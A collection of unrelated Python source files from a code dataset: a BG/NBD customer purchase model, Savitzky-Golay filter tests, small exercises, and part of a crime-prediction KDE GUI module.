self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def okAction(self):
self.close()
|
StarcoderdataPython
|
360238
|
<reponame>varun97/Python<filename>minimax.py
def minimax(arr):
    # Mini-max sum: after sorting, the maximum sum excludes the smallest element
    # and the minimum sum excludes the largest element.
    arr.sort()
    max_sum = 0
    min_sum = 0
    for i in range(len(arr)):
        if i != 0:
            max_sum += arr[i]
        if i != len(arr) - 1:
            min_sum += arr[i]
    print(min_sum, max_sum)


if __name__ == "__main__":
    arr = list(map(int, input().rstrip().split()))
    minimax(arr)
|
StarcoderdataPython
|
4803881
|
"""
Implementation of the beta-geometric/NBD (BG/NBD) model from '"Counting Your Customers" the Easy Way: An Alternative to
the Pareto/NBD Model' (Fader, Hardie and Lee 2005) http://brucehardie.com/papers/018/fader_et_al_mksc_05.pdf and
accompanying technical note http://www.brucehardie.com/notes/004/
Apache 2 License
"""
from math import log, exp, sqrt
import numpy as np
import pandas as pd
import pickle
import datetime
from scipy.optimize import minimize
from scipy.special import gammaln
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
from lifetimes import BetaGeoFitter
from lifetimes import ModifiedBetaGeoFitter
from lifetimes import ParetoNBDFitter
# from lifetimes import BetaGeoBetaBinomFitter
from convert_df import split_test_df_by_pred_period, txt_to_df, df_transform, train_test_split
__author__ = '<NAME>'
'''
To do:
- Change input format
- Add conditional expectation
- Convert functions to a class
'''
class BgNbd(object):
'''
Class for creating a BG/NBD model for non-contractual transactions.
Takes a csv file as input with the following columns: customer ID, number of transactions x, time of last transaction, time customer could make a repeated transaction (T)
'''
def __init__(self, train_df, first_purch_weeks=25, train_weeks=52, max_iter=150):
self.train_weeks = train_weeks
self.train_df = train_df.reset_index()
self.first_purch_weeks = first_purch_weeks
self.max_iter = max_iter
def log_likelihood_individual(self, r, alpha, a, b, x, tx, t):
"""Log of the likelihood function for a given randomly chosen individual with purchase history = (x, tx, t) where
x is the number of transactions in time period (0, t] and tx (0 < tx <= t) is the time of the last transaction - sheet BGNBD Estimation"""
ln_a1 = gammaln(r + x) - gammaln(r) + r * log(alpha)
ln_a2 = gammaln(a + b) + gammaln(b + x) - gammaln(b) - gammaln(a + b + x)
ln_a3 = -(r + x) * log(alpha + t)
a4 = 0
if x > 0:
a4 = exp(log(a) - log(b + x - 1) - (r + x) * log(alpha + tx))
return ln_a1 + ln_a2 + log(exp(ln_a3) + a4)
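# For reference, the return value above corresponds to the BG/NBD individual log-likelihood
# from the accompanying technical note (notation mirrors the variables in this method):
#   ln A1 = ln Gamma(r + x) - ln Gamma(r) + r * ln(alpha)
#   ln A2 = ln B(a, b + x) - ln B(a, b)
#   ln A3 = -(r + x) * ln(alpha + t)
#   A4    = (a / (b + x - 1)) * (alpha + tx) ** -(r + x)   if x > 0, else 0
#   LL    = ln A1 + ln A2 + ln(exp(ln A3) + A4)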
def log_likelihood(self, r, alpha, a, b, train_df):
"""Returns sum of the individual log likelihoods
equal to cell B5 in sheet BGNBD Estimation"""
# can't put constraints on n-m minimizer so fake them here
if r <= 0 or alpha <= 0 or a <= 0 or b <= 0:
return -np.inf
train_df['ll'] = train_df.apply(lambda row: self.log_likelihood_individual(r, alpha, a, b, row['frequency'], row['recency'], row['T']), axis=1)
return train_df.ll.sum()
def maximize(self, train_df):
'''Minimize (negative of maximizing) the log_likelihood function,
i.e. change r, alpha, a and b so that the sum of indiviual log likelihoods is maximized'''
negative_ll = lambda params: -self.log_likelihood(*params, train_df=train_df)
params0 = np.array([1., 1., 1., 1.])
res = minimize(negative_ll, params0, method='nelder-mead', options={'xtol': 1e-4})
return res
def lifetimes_fit(self, train_df, penalizer_coef=0.0):
'''
fit but then using lifetimes library --> faster
'''
bgf = BetaGeoFitter(penalizer_coef=penalizer_coef)
data = train_df
bgf.fit(data['frequency'], data['recency'], data['T'])
params = bgf.params_
self.r = params['r']
self.alpha = params['alpha']
self.a = params['a']
self.b = params['b']
return params
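# Hypothetical usage sketch (assumes an RFM dataframe with 'customer_id', 'frequency',
# 'recency' and 'T' columns; the names below are illustrative):
#   model = BgNbd(rfm_df, first_purch_weeks=12, train_weeks=39)
#   model.lifetimes_fit(rfm_df)
#   pred_matrix, total_freq = model.total_conditional_prediction(pred_weeks=39)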
def modified_fit(self, train_df, penalizer_coef=0.0):
'''
Modified BetaGeometric NBD model from lifetimes
'''
mbgf = ModifiedBetaGeoFitter(penalizer_coef=penalizer_coef)
mbgf.fit(train_df['frequency'], train_df['recency'], train_df['T'])
params = mbgf.params_
self.r = params['r']
self.alpha = params['alpha']
self.a = params['a']
self.b = params['b']
return params
def pareto_fit(self, train_df, penalizer_coef=0.0):
'''
Pareto/NBD model fit using the lifetimes library (ParetoNBDFitter).
'''
pareto = ParetoNBDFitter()
data = train_df
pareto.fit(data['frequency'], data['recency'], data['T'])
params = pareto.params_
self.r = params['r']
self.alpha = params['alpha']
self.s = params['s']
self.beta = params['beta']
return params
def _negative_log_likelihood(self, params, freq, rec, T, penalizer_coef):
if np.any(np.asarray(params) <= 0.):
return np.inf
r, alpha, s, beta = params
x = freq
r_s_x = r + s + x
A_1 = gammaln(r + x) - gammaln(r) + r * log(alpha) + s * log(beta)
log_A_0 = ParetoNBDFitter._log_A_0(params, freq, rec, T)
A_2 = np.logaddexp(-(r + x) * log(alpha + T) - s * log(beta + T), log(s) + log_A_0 - log(r_s_x))
penalizer_term = penalizer_coef * sum(np.asarray(params) ** 2)
return -(A_1 + A_2).mean() + penalizer_term
def pareto_conditional_expected_number_of_purchases_up_to_time(self, pred_weeks, frequency, recency, T):
"""
Calculate the expected number of repeat purchases up to time t for a randomly choose individual from
the population, given they have purchase history (frequency, recency, T)
Parameters:
t: a scalar or array of times.
frequency: a scalar: historical frequency of customer.
recency: a scalar: historical recency of customer.
T: a scalar: age of the customer.
Returns: a scalar or array
"""
x, t_x = frequency, recency
params = self.r, self.alpha, self.s, self.beta
r, alpha, s, beta = self.r, self.alpha, self.s, self.beta
likelihood = -self._negative_log_likelihood(params, x, t_x, T, 0)
first_term = gammaln(r + x) - gammaln(r) + r*log(alpha) + s*log(beta) - (r + x)*log(alpha + T) - s*log(beta + T)
second_term = log(r + x) + log(beta + T) - log(alpha + T)
third_term = log((1 - ((beta + T) / (beta + T + pred_weeks)) ** (s - 1))/(s - 1))
return exp(first_term + second_term + third_term - likelihood)
def pareto_total_conditional_prediction(self, pred_weeks):
'''
Make a single prediction for all customers and return the sum over a specific period of time
returns a matrix of expected sales by customer and the total sales prediction
'''
self.train_df['pred'] = 0.
self.train_df['actual'] = 0.
pred_df = self.train_df[['customer_id', 'pred', 'actual']]
self.pred_actual_matrix = pred_df.as_matrix()
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.pareto_conditional_expected_number_of_purchases_up_to_time(pred_weeks, x, recency, T)
self.pred_actual_matrix[i][1] = pred
total_freq += pred
return self.pred_actual_matrix, total_freq
def pareto_pred_and_actuals_matrix(self, test_df, pred_weeks):
'''
Adds column of actual values next to predicted values
'''
self.pred_actual_matrix, total_freq = self.pareto_total_conditional_prediction(pred_weeks)
# add column of zeros to pred_matrix, fill in with actual values
test_dict = split_test_df_by_pred_period(test_df, pred_weeks)
for i in xrange(self.pred_actual_matrix.shape[0]):
self.pred_actual_matrix[i][2] = test_dict.get(self.pred_actual_matrix[i][0], 0)
return self.pred_actual_matrix
def fit(self, train_df):
res = self.maximize(train_df)
if res.status != 0:
raise Exception(res.message)
self.r, self.alpha, self.a, self.b = res.x
return self.r, self.alpha, self.a, self.b
def params_(self):
return 'r: {}, alpha: {}, a: {}, b: {}'.format(self.r, self.alpha, self.a, self.b)
def create_ext_df(self, max_iter=150):
'''
- EXt = the expected number of transactions for a randomly-chosen individual in a time period of length t given r, alpha, a and b
- returns df with the gaussian hypergeometric cost function for every day
Iterates until uj is close to 0 or the maximum number of iterations is reached
'''
# self.r, self.alpha, self.a, self.b = 0.243, 4.414, 0.793, 2.426
total_weeks = self.train_weeks + self.pred_weeks
ext_df = pd.DataFrame(0, index=range(0, total_weeks), columns=['t', 'ext', '2F1', 'z'])
ext_df['t'] = ext_df.apply(lambda x: x +1/7.).cumsum()
ext_df['z'] = ext_df.t.apply(lambda x: x/ float(self.alpha + x))
ext_df['2F1'] = ext_df.z.apply(lambda row: self.gaussian_hypergeometric(row, max_iter))
ext_df['ext'] = ext_df.apply(lambda row: (self.a + self.b - 1)/ (self.a - 1) * (1 - (self.alpha/ (self.alpha + row['t'])) **self.r * row['2F1']), axis=1)
return ext_df
def gaussian_hypergeometric(self, row_z, max_iter):
'''Evaluates the Gaussian hypergeometric (2F1) cost term for every day; see the '2F1' lambda in create_ext_df.'''
gaus_cost = 1
uj = 1
for i in range(max_iter):
u_new = uj * row_z * (self.r + i) * (self.b + i)/ ((self.a + self.b - 1 + i) * (i + 1))
gaus_cost += u_new
uj = u_new
return gaus_cost
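# The loop above evaluates the Gauss hypergeometric series 2F1(r, b; a + b - 1; z) term by
# term: u_0 = 1 and u_{j+1} = u_j * z * (r + j) * (b + j) / ((a + b - 1 + j) * (j + 1)),
# with the running sum accumulated in gaus_cost.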
def first_purchase_count_id(self):
'''
Counts the number of customers grouped by the time of their first purchase.
'''
self.train_df['first_purch'] = self.train_df.apply(lambda row: self.train_weeks - row['T'], axis = 1)
first_purch_cnt = self.train_df.groupby('first_purch')['customer_id'].count().reset_index(name="cnt")
first_purch_cnt.first_purch = first_purch_cnt.first_purch.round(2)
first_purch_df = pd.DataFrame(0, index=range(0, self.first_purch_weeks * 7), columns=['first_purch'])
first_purch_df['first_purch'] = first_purch_df.apply(lambda x: x +1/7.).cumsum().round(2)
return first_purch_df.set_index('first_purch').join(first_purch_cnt.set_index('first_purch')).fillna(0).reset_index()
def cummulative_repeated_sales(self, cum_weeks=10):
'''
Creates a forecast of repeat purchasing by calculating the expected number of weekly repeat transactions (cumulative)'''
ext_df = self.create_ext_df()
n_s = self.first_purchase_count_id()
cum_rpt_sls = 0
i_ext = cum_weeks * 7 - 2
for i in xrange(cum_weeks * 7 - 1):
cum_rpt_sls += ext_df['ext'][i_ext] * n_s['cnt'][i]
i_ext -= 1
return cum_rpt_sls
def single_conditional_prediction(self, ID, x, recency, T, pred_weeks=''):
'''
For a randomly-chosen individual, computes the expected number of transactions in a time period of length t (pred_weeks).
Predicts a particular customer's future purchasing, given information about his past behavior and the estimates of the four model parameters.
'''
self.max_iter = 150
if pred_weeks == '':
pred_weeks = self.pred_weeks
a_id = self.r + x
b_id = self.b + x
c_id = self.a + self.b + x - 1
z_id = pred_weeks/ (self.alpha + T + pred_weeks)
gaus_cost = 1 # == 2F1 in paper
uj = 1
for i in xrange(1, self.max_iter):
u_new = uj * (a_id + i - 1) * (b_id + i - 1)/ ((c_id + i - 1) * i) * z_id
gaus_cost += u_new
uj = u_new
return (self.a + self.b + x - 1)/ (self.a - 1) * (1 - ((self.alpha + T) / (self.alpha + T + pred_weeks)) ** (self.r + x) * gaus_cost)/ (1 + (x > 0) * self.a / (self.b + x - 1) * ((self.alpha + T)/ (self.alpha + recency)) ** (self.r + x))
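# The return expression above corresponds to the BG/NBD conditional expectation
# E[X(T, T + t] | x, t_x, T] (Fader, Hardie & Lee 2005), with t = pred_weeks:
#   numerator   = ((a + b + x - 1) / (a - 1)) * (1 - ((alpha + T) / (alpha + T + t)) ** (r + x) * 2F1)
#   denominator = 1 + [x > 0] * (a / (b + x - 1)) * ((alpha + T) / (alpha + t_x)) ** (r + x)
# where 2F1 = 2F1(r + x, b + x; a + b + x - 1; t / (alpha + T + t)) is the series summed in gaus_cost.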
def total_conditional_prediction(self, pred_weeks=''):
'''
Make a single prediction for all customers and return the sum over a specific period of time
returns a matrix of expected sales by customer and the total sales prediction
'''
if pred_weeks == '':
pred_weeks = self.pred_weeks
self.train_df['pred'] = 0.
self.train_df['actual'] = 0.
pred_df = self.train_df[['customer_id', 'pred', 'actual']]
self.pred_actual_matrix = pred_df.as_matrix()
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.single_conditional_prediction(ID, x, recency, T , pred_weeks)
self.pred_actual_matrix[i][1] = pred
total_freq += pred
return self.pred_actual_matrix, total_freq
def conditional_prediction_total_freq_only(self, pred_weeks):
'''
Similar to total_conditional_prediction but skips building the prediction matrix, so it is faster.
Use this function for total_prediction_over_time.
'''
total_freq = 0
for i in range(0, self.train_df.shape[0]):
ID = self.train_df.iloc[i]['customer_id']
x = self.train_df.iloc[i]['frequency']
recency = self.train_df.iloc[i]['recency']
T = self.train_df.iloc[i]['T']
pred = self.single_conditional_prediction(ID, x, recency, T , pred_weeks)
total_freq += pred
return total_freq
def total_prediction_over_time(self, test_df, total_pred_weeks=39):
'''
Create dataframe from test, with a row for every day and create a cumsum for the num of transactions
loop over every day and get the total_freq from total_conditional_prediction(), and append to dataframe
'''
# cut off transactions that are outside the prediction period
test_df = test_df[test_df['test_weeks'] <= total_pred_weeks]
# filter on same customer ids as used in the train_df. Group by date to get the num of transactions per date
test_df = test_df[test_df.customer_id.isin(self.train_df['customer_id'].tolist())]
# create empty df to fill in the results
columns = ['act_cumsum', 'pred_x', 'pred_cumsum']
index = np.linspace(1/float(7), total_pred_weeks, total_pred_weeks*7)
pred_by_day_df = pd.DataFrame(index=index, columns=columns)
pred_by_day_df = pred_by_day_df.fillna(0.) # with floats 0s rather than NaNs
pred_by_day_df = pred_by_day_df.join(test_df.groupby('test_weeks')['cnt_trans'].sum())
pred_by_day_df = pred_by_day_df.rename(columns={'cnt_trans': 'acrecency'})
pred_by_day_df.acrecency = pred_by_day_df.acrecency.fillna(0)
pred_by_day_df['act_cumsum'] = pred_by_day_df.acrecency.cumsum()
pred_by_day_df = pred_by_day_df.reset_index()
pred_by_day_df['pred_x'] = pred_by_day_df['index'].apply(lambda row: self.conditional_prediction_total_freq_only( pred_weeks=row))
pred_by_day_df['pred_cumsum'] = pred_by_day_df.pred_x.cumsum()
pred_by_day_df['perc_similar'] = pred_by_day_df['pred_cumsum'] / pred_by_day_df[ 'act_cumsum']
return pred_by_day_df
def pred_and_actuals_matrix(self, test_df, pred_weeks):
'''
Adds column of actual values next to predicted values
'''
if pred_weeks == '':
pred_weeks = self.pred_weeks
self.pred_actual_matrix, total_freq = self.total_conditional_prediction(pred_weeks)
# add column of zeros to pred_matrix, fill in with actual values
test_dict = split_test_df_by_pred_period(test_df, pred_weeks)
for i in xrange(self.pred_actual_matrix.shape[0]):
self.pred_actual_matrix[i][2] = test_dict.get(self.pred_actual_matrix[i][0], 0)
return self.pred_actual_matrix
def r2(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return r2_score(y_true, y_pred)
def rmse(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return sqrt(mean_squared_error(y_true, y_pred))
def mean_absolute_error(self):
y_true = self.pred_actual_matrix[:, 2]
y_pred = self.pred_actual_matrix[:, 1]
return mean_absolute_error(y_true, y_pred)
def rmsle(self):
'''
Root mean squared logarithmic error: penalizes relative (percentage-like) errors, so it is less sensitive to the absolute scale of the values.
'''
y_true = self.pred_actual_matrix[:, 2].astype(float)
y_pred = self.pred_actual_matrix[:, 1].astype(float)
return np.sqrt(np.square(np.log(y_pred + 1) - np.log(y_true + 1)).mean())
if __name__ == '__main__':
main()
# '''Sample data consist of train_df who made their first transaction in week 0 to 12, we have info on their repeat purchasing behavior up to the week 39 and make predictions up to week 78'''
# df = pd.read_csv('../data/test.csv', sep='\t')
# df = pd.read_csv('../data/test/train_df_test.csv', sep='\t')
# print df.head()
# print 'r: {}, alpha: {}, a: {}, b: {}'.format(r, alpha, a, b)
# loaded_model = pickle.load(open(filename, 'rb'))
# result = loaded_model.total_conditional_prediction(pred_weeks=10)
# pred_matrix, total_freq = loaded_model.total_conditional_prediction(train_df)
# r2_result = loaded_model.r2(test_df)
# print bgnbd.total_conditional_prediction(pred_weeks=12, max_iter=2)
# print lifetimes_fit(train_df)
# check '381568065'
|
StarcoderdataPython
|
3311196
|
<reponame>viniciusfeitosa/basic-gevent-tutorial
import gevent
import signal
def run_forever():
gevent.sleep(1000)
if __name__ == '__main__':
gevent.signal(signal.SIGQUIT, gevent.kill)
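# note: newer gevent releases expose this callable as gevent.signal_handler(signal.SIGQUIT, gevent.kill)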
thread = gevent.spawn(run_forever)
thread.join()
|
StarcoderdataPython
|
6626290
|
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_allclose, assert_equal,
assert_almost_equal, assert_array_equal,
assert_array_almost_equal)
from scipy.ndimage import convolve1d
from scipy.signal import savgol_coeffs, savgol_filter
from scipy.signal._savitzky_golay import _polyder
def check_polyder(p, m, expected):
dp = _polyder(p, m)
assert_array_equal(dp, expected)
def test_polyder():
cases = [
([5], 0, [5]),
([5], 1, [0]),
([3, 2, 1], 0, [3, 2, 1]),
([3, 2, 1], 1, [6, 2]),
([3, 2, 1], 2, [6]),
([3, 2, 1], 3, [0]),
([[3, 2, 1], [5, 6, 7]], 0, [[3, 2, 1], [5, 6, 7]]),
([[3, 2, 1], [5, 6, 7]], 1, [[6, 2], [10, 6]]),
([[3, 2, 1], [5, 6, 7]], 2, [[6], [10]]),
([[3, 2, 1], [5, 6, 7]], 3, [[0], [0]]),
]
for p, m, expected in cases:
check_polyder(np.array(p).T, m, np.array(expected).T)
#--------------------------------------------------------------------
# savgol_coeffs tests
#--------------------------------------------------------------------
def alt_sg_coeffs(window_length, polyorder, pos):
"""This is an alternative implementation of the SG coefficients.
It uses numpy.polyfit and numpy.polyval. The results should be
equivalent to those of savgol_coeffs(), but this implementation
is slower.
window_length should be odd.
"""
if pos is None:
pos = window_length // 2
t = np.arange(window_length)
unit = (t == pos).astype(int)
h = np.polyval(np.polyfit(t, unit, polyorder), t)
return h
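# Illustrative sanity check (not part of the original test suite): for polyorder 0 or 1 with a
# centred window, the Savitzky-Golay smoothing coefficients reduce to a plain moving average,
# e.g. savgol_coeffs(5, 1) is approximately [0.2, 0.2, 0.2, 0.2, 0.2].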
def test_sg_coeffs_trivial():
# Test a trivial case of savgol_coeffs: polyorder = window_length - 1
h = savgol_coeffs(1, 0)
assert_allclose(h, [1])
h = savgol_coeffs(3, 2)
assert_allclose(h, [0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4)
assert_allclose(h, [0, 0, 1, 0, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1)
assert_allclose(h, [0, 0, 0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1, use='dot')
assert_allclose(h, [0, 1, 0, 0, 0], atol=1e-10)
def compare_coeffs_to_alt(window_length, order):
# For the given window_length and order, compare the results
# of savgol_coeffs and alt_sg_coeffs for pos from 0 to window_length - 1.
# Also include pos=None.
for pos in [None] + list(range(window_length)):
h1 = savgol_coeffs(window_length, order, pos=pos, use='dot')
h2 = alt_sg_coeffs(window_length, order, pos=pos)
assert_allclose(h1, h2, atol=1e-10,
err_msg=("window_length = %d, order = %d, pos = %s" %
(window_length, order, pos)))
def test_sg_coeffs_compare():
# Compare savgol_coeffs() to alt_sg_coeffs().
for window_length in range(1, 8, 2):
for order in range(window_length):
compare_coeffs_to_alt(window_length, order)
def test_sg_coeffs_exact():
polyorder = 4
window_length = 9
halflen = window_length // 2
x = np.linspace(0, 21, 43)
delta = x[1] - x[0]
# The data is a cubic polynomial. We'll use an order 4
# SG filter, so the filtered values should equal the input data
# (except within half window_length of the edges).
y = 0.5 * x ** 3 - x
h = savgol_coeffs(window_length, polyorder)
y0 = convolve1d(y, h)
assert_allclose(y0[halflen:-halflen], y[halflen:-halflen])
# Check the same input, but use deriv=1. dy is the exact result.
dy = 1.5 * x ** 2 - 1
h = savgol_coeffs(window_length, polyorder, deriv=1, delta=delta)
y1 = convolve1d(y, h)
assert_allclose(y1[halflen:-halflen], dy[halflen:-halflen])
# Check the same input, but use deriv=2. d2y is the exact result.
d2y = 3.0 * x
h = savgol_coeffs(window_length, polyorder, deriv=2, delta=delta)
y2 = convolve1d(y, h)
assert_allclose(y2[halflen:-halflen], d2y[halflen:-halflen])
def test_sg_coeffs_deriv():
# The data in `x` is a sampled parabola, so using savgol_coeffs with an
# order 2 or higher polynomial should give exact results.
i = np.array([-2.0, 0.0, 2.0, 4.0, 6.0])
x = i ** 2 / 4
dx = i / 2
d2x = 0.5 * np.ones_like(i)
for pos in range(x.size):
coeffs0 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot')
assert_allclose(coeffs0.dot(x), x[pos], atol=1e-10)
coeffs1 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=1)
assert_allclose(coeffs1.dot(x), dx[pos], atol=1e-10)
coeffs2 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=2)
assert_allclose(coeffs2.dot(x), d2x[pos], atol=1e-10)
def test_sg_coeffs_large():
# Test that for large values of window_length and polyorder the array of
# coefficients returned is symmetric. The aim is to ensure that
# no potential numeric overflow occurs.
coeffs0 = savgol_coeffs(31, 9)
assert_array_almost_equal(coeffs0, coeffs0[::-1])
coeffs1 = savgol_coeffs(31, 9, deriv=1)
assert_array_almost_equal(coeffs1, -coeffs1[::-1])
#--------------------------------------------------------------------
# savgol_filter tests
#--------------------------------------------------------------------
def test_sg_filter_trivial():
""" Test some trivial edge cases for savgol_filter()."""
x = np.array([1.0])
y = savgol_filter(x, 1, 0)
assert_equal(y, [1.0])
# Input is a single value. With a window length of 3 and polyorder 1,
# the value in y is from the straight-line fit of (-1,0), (0,3) and
# (1, 0) at 0. This is just the average of the three values, hence 1.0.
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_almost_equal(y, [1.0], decimal=15)
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='nearest')
assert_almost_equal(y, [3.0], decimal=15)
x = np.array([1.0] * 3)
y = savgol_filter(x, 3, 1, mode='wrap')
assert_almost_equal(y, [1.0, 1.0, 1.0], decimal=15)
def test_sg_filter_basic():
# Some basic test cases for savgol_filter().
x = np.array([1.0, 2.0, 1.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, [1.0, 4.0 / 3, 1.0])
y = savgol_filter(x, 3, 1, mode='mirror')
assert_allclose(y, [5.0 / 3, 4.0 / 3, 5.0 / 3])
y = savgol_filter(x, 3, 1, mode='wrap')
assert_allclose(y, [4.0 / 3, 4.0 / 3, 4.0 / 3])
def test_sg_filter_2d():
x = np.array([[1.0, 2.0, 1.0],
[2.0, 4.0, 2.0]])
expected = np.array([[1.0, 4.0 / 3, 1.0],
[2.0, 8.0 / 3, 2.0]])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, expected)
y = savgol_filter(x.T, 3, 1, mode='constant', axis=0)
assert_allclose(y, expected.T)
def test_sg_filter_interp_edges():
# Another test with low degree polynomial data, for which we can easily
# give the exact results. In this test, we use mode='interp', so
# savgol_filter should match the exact solution for the entire data set,
# including the edges.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
# Polynomial test data.
x = np.array([t,
3 * t ** 2,
t ** 3 - t])
dx = np.array([np.ones_like(t),
6 * t,
3 * t ** 2 - 1.0])
d2x = np.array([np.zeros_like(t),
6 * np.ones_like(t),
6 * t])
window_length = 7
y = savgol_filter(x, window_length, 3, axis=-1, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
# Transpose everything, and test again with axis=0.
x = x.T
dx = dx.T
d2x = d2x.T
y = savgol_filter(x, window_length, 3, axis=0, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
def test_sg_filter_interp_edges_3d():
# Test mode='interp' with a 3-D array.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
x1 = np.array([t, -t])
x2 = np.array([t ** 2, 3 * t ** 2 + 5])
x3 = np.array([t ** 3, 2 * t ** 3 + t ** 2 - 0.5 * t])
dx1 = np.array([np.ones_like(t), -np.ones_like(t)])
dx2 = np.array([2 * t, 6 * t])
dx3 = np.array([3 * t ** 2, 6 * t ** 2 + 2 * t - 0.5])
# z has shape (3, 2, 21)
z = np.array([x1, x2, x3])
dz = np.array([dx1, dx2, dx3])
y = savgol_filter(z, 7, 3, axis=-1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=-1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (3, 21, 2)
z = np.array([x1.T, x2.T, x3.T])
dz = np.array([dx1.T, dx2.T, dx3.T])
y = savgol_filter(z, 7, 3, axis=1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (21, 3, 2)
z = z.swapaxes(0, 1).copy()
dz = dz.swapaxes(0, 1).copy()
y = savgol_filter(z, 7, 3, axis=0, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=0, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
|
StarcoderdataPython
|
6448875
|
<reponame>sumau/PredictCode
"""
kde
~~~
A variety of "other" KDE methods, not drawn directly from the literature.
"""
from . import predictor
import open_cp.predictors
import tkinter as tk
import tkinter.ttk as ttk
import open_cp.kde
import open_cp.gui.tk.util as util
import open_cp.gui.tk.richtext as richtext
import open_cp.gui.tk.tooltips as tooltips
import open_cp.gui.tk.mtp as mtp
import enum
import numpy as np
_text = {
"main" : ("Other Kernel Density Estimation methods\n\n"
+ "A selection of other KDE (kernel density estimation) methods; to be compared with "
+ "the 'Scipy KDE naive estimator' (we here offer more options) or the 'Retrospective' and "
+ "'Prospective' hotspotting algorithms (which are explicitly explained in the scientific "
+ "literature, whereas the methods here are not).\n"
+ "We offer two ways to customise the algorithm: the choice of the KDE algorithm to be "
+ "applied to the spacial coordinates (estimating a continuous risk profile from the location "
+ "of events) and how (or not) to weight time.\n\n"
+ "Training Data usage: Can either be ignored, or directly used."
),
"no_data" : "No data points found in time range: have enough crime types been selected?",
"sk" : "Space kernel: ",
"sktt" : "How the spatial locations of points are converted to a continuous risk profile",
"sks" : "Space kernel settings",
"skernals" : ["Scipy KDE", "Nearest neighbour variable bandwidth"],
"tk" : "Treatment of timestamps: ",
"tktt" : "How we should treat timestamps",
"tks" : "Timestamp adjustment settings",
"tchoices" : ["Training data only", "All time in window", "Exponential decay", "Quadratic decay"],
"scipy_main" : "Uses the SciPY builtin Gaussian KDE method. This is thus like the 'naive' predictor, but with improved control over the usage of time information.",
"nkde_main" : "Uses a variable bandwidth `k`th nearest neighbour Gaussian KDE. Tends to identify clusters better.",
"nkde_k" : "Which nearest neighbour to use:",
"nkde_k_tt" : "The bandwidth for the contribution to a kernel at a point is chosen by looking at the distance from the point to this nearest neighbour. Larger values lead to a 'smoother' kernel. Values in the range 15 to 100 are common.",
"to_main" : "Only use the training date range of data to compute the kernel. All points are treated equally. Probably of mostly academic interest.",
"wi_main" : "Use all data in a window of time before the prediction date. All points are treated equally.",
"wi_days" : "Days in window: ",
"wi_days_tt" : "The time window will be this many days in length",
"ex_main" : "The weighting given to points decays exponentially in the time between the event occurring and the prediction date.",
"ex_scale" : "Scale in days: ",
"ex_scale_tt" : "The 'scale' of the exponential, which is the time period over which the intensity falls to about 37% of the base intensity.",
"qu_main" : "The weighting given to points decays exponentially in the time between the event occurring and the prediction date.",
"qu_scale" : "Scale in days: ",
"qu_scale_tt" : "The 'scale' of the decay. The larger this value, the longer in time it takes for events to have less intensity. See the graph for the effect.",
"days" : "Days",
"int" : "Relative weighting",
"kdeplot" : "Preview of the selected KDE method, as applied to the entire data-set, assuming a valid coordinate projector is selected. No timestamp adjustment is made.",
}
class KDE(predictor.Predictor):
def __init__(self, model):
super().__init__(model)
self.space_kernel = 0
        self._sk_model = [ScipyKDE(self), NearestKDE(self)]
self.time_kernel = 0
self._tk_model = [TrainOnly(), Window(), ExpDecay(), QuadDecay()]
@staticmethod
def describe():
return "Kernel density estimation predictor"
@staticmethod
def order():
return predictor._TYPE_GRID_PREDICTOR
def make_view(self, parent):
return KDEView(parent, self)
@property
def name(self):
return "KDE predictor ({},{})".format(self.space_kernel.name,
self.time_kernel.name)
@property
def settings_string(self):
out = [self.space_kernel_model.settings_string, self.time_kernel_model.settings_string]
out = [x for x in out if x != ""]
return ", ".join(out)
def to_dict(self):
data = {"space_kernel" : self.space_kernel.value}
data["space_models"] = { model.name : model.to_dict() for model in self._sk_model }
data["time_models"] = { model.name : model.to_dict() for model in self._tk_model }
return data
def from_dict(self, data):
        self.space_kernel = int(data["space_kernel"])
        if "time_kernel" in data:
            self.time_kernel = int(data["time_kernel"])
for name, d in data["space_models"].items():
